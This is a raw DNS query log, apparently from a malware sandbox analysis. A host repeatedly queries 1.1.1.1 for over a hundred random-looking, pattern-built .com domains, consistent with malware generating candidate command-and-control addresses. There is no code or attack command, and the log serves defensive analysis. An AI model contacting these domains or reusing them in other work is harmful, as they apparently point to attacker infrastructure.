                                                                                                                                                                                                          Sep 8, 2024 10:53:52.205245972 CEST192.168.2.91.1.1.10x4e15Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.205344915 CEST192.168.2.91.1.1.10xf588Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.206213951 CEST192.168.2.91.1.1.10x9254Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.207237959 CEST192.168.2.91.1.1.10xc41dStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.207881927 CEST192.168.2.91.1.1.10x9a1aStandard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.208612919 CEST192.168.2.91.1.1.10xaf57Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.217109919 CEST192.168.2.91.1.1.10x1e0cStandard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.220474005 CEST192.168.2.91.1.1.10x6eacStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.221038103 CEST192.168.2.91.1.1.10x1a7fStandard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.221124887 CEST192.168.2.91.1.1.10x8fafStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.222620964 CEST192.168.2.91.1.1.10x77d2Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.223094940 CEST192.168.2.91.1.1.10x27dfStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.223679066 CEST192.168.2.91.1.1.10xaa28Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.224796057 CEST192.168.2.91.1.1.10x3376Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.226140976 CEST192.168.2.91.1.1.10x370Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.239439011 CEST192.168.2.91.1.1.10x45ecStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.247390985 CEST192.168.2.91.1.1.10x525Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.249484062 CEST192.168.2.91.1.1.10x7f32Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.251156092 CEST192.168.2.91.1.1.10xa282Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.267373085 CEST192.168.2.91.1.1.10xfe3dStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.267607927 CEST192.168.2.91.1.1.10xaa1dStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268152952 CEST192.168.2.91.1.1.10xca73Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268299103 CEST192.168.2.91.1.1.10x634cStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268610954 CEST192.168.2.91.1.1.10xc90dStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.269953966 CEST192.168.2.91.1.1.10x4892Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282124043 CEST192.168.2.91.1.1.10xcfbcStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282500982 CEST192.168.2.91.1.1.10x32f8Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282766104 CEST192.168.2.91.1.1.10xf254Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.282933950 CEST192.168.2.91.1.1.10xa3eaStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.285453081 CEST192.168.2.91.1.1.10xf9a4Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.285623074 CEST192.168.2.91.1.1.10x71dcStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.287408113 CEST192.168.2.91.1.1.10x34ddStandard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.287739038 CEST192.168.2.91.1.1.10xccf5Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.288081884 CEST192.168.2.91.1.1.10xc5a4Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289377928 CEST192.168.2.91.1.1.10x7da3Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289573908 CEST192.168.2.91.1.1.10xa5dbStandard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.289926052 CEST192.168.2.91.1.1.10xce45Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.291750908 CEST192.168.2.91.1.1.10xe855Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.293747902 CEST192.168.2.91.1.1.10xe1e0Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.293935061 CEST192.168.2.91.1.1.10x1bbdStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294075012 CEST192.168.2.91.1.1.10x5414Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294105053 CEST192.168.2.91.1.1.10x33e1Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294287920 CEST192.168.2.91.1.1.10x984fStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294325113 CEST192.168.2.91.1.1.10x92c9Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.294444084 CEST192.168.2.91.1.1.10x227cStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.295022964 CEST192.168.2.91.1.1.10xe89dStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.295804977 CEST192.168.2.91.1.1.10xaf79Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.296461105 CEST192.168.2.91.1.1.10x968fStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.296890974 CEST192.168.2.91.1.1.10xa5dStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.297600031 CEST192.168.2.91.1.1.10x76cStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.298217058 CEST192.168.2.91.1.1.10xb7c4Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.303864956 CEST192.168.2.91.1.1.10xf996Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.303951979 CEST192.168.2.91.1.1.10x7eb5Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.307383060 CEST192.168.2.91.1.1.10xfc4aStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.307780981 CEST192.168.2.91.1.1.10xba2aStandard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.342204094 CEST192.168.2.91.1.1.10xcd96Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.354352951 CEST192.168.2.91.1.1.10xec65Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.355160952 CEST192.168.2.91.1.1.10xd849Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.355356932 CEST192.168.2.91.1.1.10xd258Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.355568886 CEST192.168.2.91.1.1.10x7d05Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.355807066 CEST192.168.2.91.1.1.10x55edStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.358045101 CEST192.168.2.91.1.1.10x76f6Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.358423948 CEST192.168.2.91.1.1.10x98Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.359127998 CEST192.168.2.91.1.1.10x4219Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.359339952 CEST192.168.2.91.1.1.10xfe7fStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.359731913 CEST192.168.2.91.1.1.10xf402Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.359882116 CEST192.168.2.91.1.1.10x2c82Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360033989 CEST192.168.2.91.1.1.10x5fa2Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360198975 CEST192.168.2.91.1.1.10x7fb6Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360341072 CEST192.168.2.91.1.1.10x6a40Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360497952 CEST192.168.2.91.1.1.10xbbb1Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.360584021 CEST192.168.2.91.1.1.10x4ef1Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.416161060 CEST192.168.2.91.1.1.10xeb6cStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.416560888 CEST192.168.2.91.1.1.10xfbfdStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.416843891 CEST192.168.2.91.1.1.10x66cfStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.416985035 CEST192.168.2.91.1.1.10x48ecStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.417269945 CEST192.168.2.91.1.1.10x3016Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.417532921 CEST192.168.2.91.1.1.10x5e00Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.418540001 CEST192.168.2.91.1.1.10xebdaStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.419598103 CEST192.168.2.91.1.1.10xbb26Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.420034885 CEST192.168.2.91.1.1.10x3171Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.421092987 CEST192.168.2.91.1.1.10x724aStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.421324015 CEST192.168.2.91.1.1.10xc3e1Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.421461105 CEST192.168.2.91.1.1.10x7b0cStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.423407078 CEST192.168.2.91.1.1.10xacb6Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.425816059 CEST192.168.2.91.1.1.10x6b45Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.427850962 CEST192.168.2.91.1.1.10x5866Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.477797031 CEST192.168.2.91.1.1.10xc1c2Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.555351973 CEST192.168.2.91.1.1.10xbe08Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.694495916 CEST192.168.2.91.1.1.10x35e7Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.697125912 CEST192.168.2.91.1.1.10x284bStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790776014 CEST192.168.2.91.1.1.10x1944Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790776014 CEST192.168.2.91.1.1.10xbc6eStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790947914 CEST192.168.2.91.1.1.10xa621Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.793252945 CEST192.168.2.91.1.1.10x376fStandard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.793800116 CEST192.168.2.91.1.1.10x6accStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.796149969 CEST192.168.2.91.1.1.10x5d87Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.334394932 CEST192.168.2.91.1.1.10x817fStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.334609985 CEST192.168.2.91.1.1.10xe6f8Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.334780931 CEST192.168.2.91.1.1.10xf4c4Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.334937096 CEST192.168.2.91.1.1.10xd063Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.335083961 CEST192.168.2.91.1.1.10xf602Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.335328102 CEST192.168.2.91.1.1.10x2b01Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.335510015 CEST192.168.2.91.1.1.10x9ab4Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.339320898 CEST192.168.2.91.1.1.10x6b3Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.339833021 CEST192.168.2.91.1.1.10x5e7Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.360496998 CEST192.168.2.91.1.1.10x965cStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.363627911 CEST192.168.2.91.1.1.10x9924Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.366234064 CEST192.168.2.91.1.1.10xb244Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.366398096 CEST192.168.2.91.1.1.10x1fa8Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.377307892 CEST192.168.2.91.1.1.10x99daStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.377796888 CEST192.168.2.91.1.1.10xb70aStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.377983093 CEST192.168.2.91.1.1.10x2ae2Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.381140947 CEST192.168.2.91.1.1.10x1534Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.383217096 CEST192.168.2.91.1.1.10xcb27Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.383622885 CEST192.168.2.91.1.1.10x89d6Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.412312031 CEST192.168.2.91.1.1.10x8d45Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.445478916 CEST192.168.2.91.1.1.10x72d9Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.453253031 CEST192.168.2.91.1.1.10xcab8Standard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.458969116 CEST192.168.2.91.1.1.10x1157Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:04.994214058 CEST192.168.2.91.1.1.10xfdcbStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.032231092 CEST192.168.2.91.1.1.10xfd79Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.032645941 CEST192.168.2.91.1.1.10x7654Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.032763004 CEST192.168.2.91.1.1.10xecefStandard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.033050060 CEST192.168.2.91.1.1.10x200eStandard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.033137083 CEST192.168.2.91.1.1.10x8b7cStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.033369064 CEST192.168.2.91.1.1.10x4081Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.033667088 CEST192.168.2.91.1.1.10x2fccStandard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.041277885 CEST192.168.2.91.1.1.10x1b68Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.041318893 CEST192.168.2.91.1.1.10x907fStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.042120934 CEST192.168.2.91.1.1.10x12dfStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.043195963 CEST192.168.2.91.1.1.10x963Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.054763079 CEST192.168.2.91.1.1.10x4b04Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.054881096 CEST192.168.2.91.1.1.10x2a25Standard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.055098057 CEST192.168.2.91.1.1.10x8c5eStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057285070 CEST192.168.2.91.1.1.10xb8c7Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057473898 CEST192.168.2.91.1.1.10x63a5Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057501078 CEST192.168.2.91.1.1.10xb915Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057733059 CEST192.168.2.91.1.1.10x10e6Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057754040 CEST192.168.2.91.1.1.10x9886Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057972908 CEST192.168.2.91.1.1.10x109fStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.057972908 CEST192.168.2.91.1.1.10x4628Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.058159113 CEST192.168.2.91.1.1.10xa846Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.058159113 CEST192.168.2.91.1.1.10x1fe5Standard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.058352947 CEST192.168.2.91.1.1.10x65d3Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.060064077 CEST192.168.2.91.1.1.10xdbcbStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.060259104 CEST192.168.2.91.1.1.10x9f48Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.060507059 CEST192.168.2.91.1.1.10x72d7Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.063991070 CEST192.168.2.91.1.1.10xf3cStandard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064019918 CEST192.168.2.91.1.1.10x1a2eStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064240932 CEST192.168.2.91.1.1.10x5d15Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064260960 CEST192.168.2.91.1.1.10x822bStandard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064431906 CEST192.168.2.91.1.1.10x495fStandard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064538002 CEST192.168.2.91.1.1.10xa3beStandard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064646959 CEST192.168.2.91.1.1.10xbbedStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.064841986 CEST192.168.2.91.1.1.10xcd9fStandard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:05.065099001 CEST192.168.2.91.1.1.10x7cf5Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.357971907 CEST192.168.2.91.1.1.10xbeafStandard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.363343954 CEST192.168.2.91.1.1.10xa1bdStandard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.364331007 CEST192.168.2.91.1.1.10x83edStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.369193077 CEST192.168.2.91.1.1.10x81a8Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.369715929 CEST192.168.2.91.1.1.10x959Standard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.375792980 CEST192.168.2.91.1.1.10x2f8bStandard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.380445004 CEST192.168.2.91.1.1.10xb33dStandard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.407135010 CEST192.168.2.91.1.1.10x8612Standard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.413397074 CEST192.168.2.91.1.1.10x63b3Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.419975996 CEST192.168.2.91.1.1.10xf6fdStandard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.426214933 CEST192.168.2.91.1.1.10xdee6Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.426516056 CEST192.168.2.91.1.1.10xdc7bStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.437872887 CEST192.168.2.91.1.1.10xeb3bStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.456649065 CEST192.168.2.91.1.1.10x56e5Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.489433050 CEST192.168.2.91.1.1.10xfba8Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.490026951 CEST192.168.2.91.1.1.10xed2aStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.490775108 CEST192.168.2.91.1.1.10x28bfStandard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.492104053 CEST192.168.2.91.1.1.10xb612Standard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.492156982 CEST192.168.2.91.1.1.10xb20cStandard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.492779970 CEST192.168.2.91.1.1.10xd5e6Standard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.493232965 CEST192.168.2.91.1.1.10xfdcfStandard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.493853092 CEST192.168.2.91.1.1.10x20e0Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.494206905 CEST192.168.2.91.1.1.10xe8dbStandard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.494941950 CEST192.168.2.91.1.1.10x53Standard query (0)pufycol.comA (IP address)IN (0x0001)false
